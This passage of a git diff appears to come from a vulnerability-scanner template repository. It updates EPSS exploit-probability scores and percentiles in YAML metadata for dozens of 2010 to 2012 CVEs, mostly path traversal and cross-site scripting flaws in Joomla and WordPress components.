b/http/cves/2010/CVE-2010-1981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77155 + epss-percentile: 0.77251 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 2ba73f338c..c19ff1021e 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 44e3198e6f..aaf7d34010 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86795 + epss-percentile: 0.86834 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index d417e287d9..f4801b9dc3 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 43e2ec117e..4fce86d698 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78337 + epss-percentile: 0.78453 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 764f39ae1a..28827de4c5 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78337 + epss-percentile: 0.78453 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index d198971167..19a1780143 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78337 + epss-percentile: 0.78453 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 2a84ad43d9..c5328ad5e4 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78337 + epss-percentile: 0.78453 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 5905cb0977..2aa8d1306f 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 8f2d7df959..8ca78ec368 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90562 + epss-percentile: 0.90637 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 833fba3283..d761c3ac0f 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86762 + epss-percentile: 0.86802 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 68a18af5de..175dc13416 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index e5efbbbe3f..540fd71547 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 636f1db8e8..ef925fb2a3 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - epss-score: 0.00832 - epss-percentile: 0.80041 + epss-score: 0.00813 + epss-percentile: 0.79889 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 155ed6a142..d78d18a719 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 5a2d269838..1d9f4d953a 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index fdc42c72a3..40c097c0ad 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index f5d389cf57..aeadee5bca 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 9c8c59e8dc..dd1f09c1d2 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 - epss-score: 0.97143 - epss-percentile: 0.99751 + epss-score: 0.97078 + epss-percentile: 0.99722 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 37c55cc45b..34a0c09961 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.89602 + epss-percentile: 0.89659 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index b2738060e6..2aac852a13 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90562 + epss-percentile: 0.90637 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 1f104bcb7c..b36b71c45f 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - epss-percentile: 0.76596 + epss-percentile: 0.76693 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 123ebd7f49..f164386601 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 540972ae41..f134e91bdf 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.86048 + epss-percentile: 0.86075 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index fafad30e1c..160edfc1eb 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.03561 - epss-percentile: 0.90602 + epss-percentile: 0.90672 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index aba32eb286..49bb8269d3 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - epss-percentile: 0.83662 + epss-percentile: 0.83767 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index ace71e97db..1f9bb1ff1d 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 4dbae68153..0cc92ded45 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91565 + epss-percentile: 0.91627 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index ed3e5618d0..ca5f8ca92a 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 - epss-score: 0.00938 - epss-percentile: 0.81253 + epss-score: 0.00826 + epss-percentile: 0.80059 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 4a1c1bd897..1b4e63d598 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.0016 - epss-percentile: 0.52426 + epss-percentile: 0.52502 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 4060c4e39c..3cfcfbbf88 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 - epss-percentile: 0.67001 + epss-percentile: 0.67177 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index abf68c25d8..5757acb5f0 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - epss-score: 0.104 - epss-percentile: 0.94413 + epss-score: 0.06122 + epss-percentile: 0.92816 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 05e054c6da..c98ef463fd 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 - epss-score: 0.04708 - epss-percentile: 0.91757 + epss-score: 0.03802 + epss-percentile: 0.90974 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 61a9a50fb9..a7b41c31a2 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - epss-percentile: 0.99528 + epss-percentile: 0.99543 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 5528047a15..556869225f 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89784 + epss-percentile: 0.89841 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 512b1d1609..6482519e0f 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.85658 + epss-percentile: 0.85717 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index fc79abbd29..1868778a1c 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.90318 + epss-percentile: 0.90379 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 26d4d11230..b3055ee9ae 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 - epss-score: 0.90502 - epss-percentile: 0.98536 + epss-score: 0.86205 + epss-percentile: 0.98314 cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index c74b6299d4..a365277470 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.6321 + epss-percentile: 0.63362 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 6b03042dfc..b68488e0a4 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.01913 - epss-percentile: 0.87242 + epss-percentile: 0.87299 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index fa6ae0c2ba..686557af6f 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.7165 + epss-percentile: 0.71804 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index c9a04bd4f9..461836ab9b 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4804 cwe-id: CWE-22 epss-score: 0.0358 - epss-percentile: 0.90629 + epss-percentile: 0.90699 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 81fc43e5a7..8348866acf 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01792 - epss-percentile: 0.86696 + epss-percentile: 0.86744 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 60ef2a505c..4beeb2b25d 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.71762 + epss-percentile: 0.71916 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 2a642d067e..85f995e396 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61114 + epss-percentile: 0.61277 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 062b625e3b..59b614c428 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61114 + epss-percentile: 0.61277 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 1c32f3d60a..b8ecec2050 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71648 + epss-percentile: 0.71803 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index a47e02162c..f8ef973e5e 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - epss-percentile: 0.89436 + epss-percentile: 0.89491 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 348c2ec18e..9f41c568bd 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00478 - epss-percentile: 0.73063 + epss-percentile: 0.73197 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index cbcaad14ed..b47e07ed1d 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - epss-percentile: 0.99702 + epss-percentile: 0.9971 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 990069c471..b7365c9262 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-0394 cwe-id: CWE-94 epss-score: 0.94515 - epss-percentile: 0.99036 + epss-percentile: 0.99055 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 7e797d39ce..decab44281 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.02262 - epss-percentile: 0.88405 + epss-percentile: 0.88456 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 45f5774a28..67f2d379b1 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59366 + epss-percentile: 0.59528 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index cb6a21c41a..1895fc14df 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.02053 - epss-percentile: 0.87761 + epss-percentile: 0.8779 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index fe71b944ea..356b8734b5 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0991 cwe-id: CWE-22 epss-score: 0.81788 - epss-percentile: 0.98074 + epss-percentile: 0.98092 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index c5e17f2295..551e24ed5c 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0996 cwe-id: CWE-22 epss-score: 0.00737 - epss-percentile: 0.78659 + epss-percentile: 0.78767 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 32bbc82087..ad5c3dd33f 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - epss-percentile: 0.94434 + epss-percentile: 0.94463 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1823.yaml 